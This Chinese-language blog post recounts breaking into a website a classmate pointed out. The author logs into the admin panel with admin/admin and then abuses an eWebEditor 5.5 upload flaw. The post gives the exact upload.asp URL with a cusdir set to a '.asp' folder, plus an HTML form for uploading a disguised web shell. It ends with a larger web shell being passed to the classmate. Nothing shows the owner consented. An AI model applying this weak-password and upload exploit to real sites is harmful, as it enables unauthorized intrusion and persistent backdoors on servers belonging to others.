写着玩的,之前还一直怀疑那个ewebeditor5.5的0day,碰巧遇到了,做个记录,记忆更深刻些。高手略过吧。
一个同学发过来一个网站让我看看有没有漏洞。简单看了下没扫到注入点。
随便找来一个链接加上单引号提示出错,又去看了下有没有cookies注入,测试了下提示服务器内部错误。
无奈,想去后台看看有什么弱口令没有。
在域名后面加上admin,后台界面跳出来了。
尝试用admin admin成功登录后台。
界面如下
一项一项看了看没有数据库备份,但在幻灯管理跟单页管理这又上传图片的地方,是一个经过修改的ewebeditor的页面。如下图
\
本来打算放弃的,但想起来看过某人写过的一篇文章说经过修改的ewebeditor的比较特殊的版本可以抓包,然后用nc上传拿到shell,于是抱着碰运气的心态抓了下包,抓包内容如下图。
当看到第一条post的数据(POST /admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir= HTTP/1.1)的时候突然想到了娃娃在t00ls发过的一个ewebeditor5.5的鸡肋0day,记得其中的语句跟这个类似,于是想去 t00ls重新找下,无奈t00ls这两天突然关闭了,于是百度搜索ewebeditor5.5 0day,在甲壳中论坛找到了
http://bbs.jkcing.com/viewthread.php?tid=60350我把内容贴上来。
ewebeditor高版本>=5.5鸡肋0day
利用方法:
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp
访问这个地址可以建立个qing.ASP的文件夹……
再用这个html代码上传。
<form action="http://www.hackqing.cn/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
于是访问
http://www.×××.com/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp
成功建立qing.asp文件夹,于是用附带的html语句本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。如图
访问地址得到小马一只
剩下的就不说了,帮我同学传了个大马给他了。